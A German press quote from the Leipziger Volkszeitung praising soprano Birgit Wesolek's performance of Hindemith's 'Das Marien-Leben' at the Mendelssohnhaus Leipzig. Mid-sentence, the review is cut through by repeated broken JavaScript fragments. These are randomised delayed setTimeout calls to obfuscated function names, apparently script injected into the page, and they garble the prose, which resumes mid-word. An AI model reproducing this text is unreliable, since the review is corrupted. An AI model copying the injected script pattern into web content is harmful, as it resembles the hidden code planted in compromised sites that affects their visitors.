Paul Hindemith, "Das Marien-Leben", Mendelssohnhaus Leipzig

"Wer ferngeblieben war, versäumte eine großartige Stunde mit der jungen Sopranistin Birgit Wesolek … entschied sich die Sängerin für die ungestüme, in der Stimmführung kompliziertere Erstfassung.


Der hymnische Schwung, auch Überschwang der Rilkeschen Sprache und Hindemiths jugendlicher Elan erfüllten die Aufführung. Schon im verhalten beginnenden ersten Lied 'Geburt Mariae' fandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}en Wesolek und der Pianist zu leidenschaftlichem Ausdruck. Ein Höhepunkt wurde im motorisch begleiteten Gesang von der 'Hochzeit zu Kana' erreicht. Aber auch ein schlichter Gesang wie 'Pieta' strahlte Größe aus, die im dritten der Lieder 'Vom Tode Mariea' gipfelte."

Leipziger Volkszeitung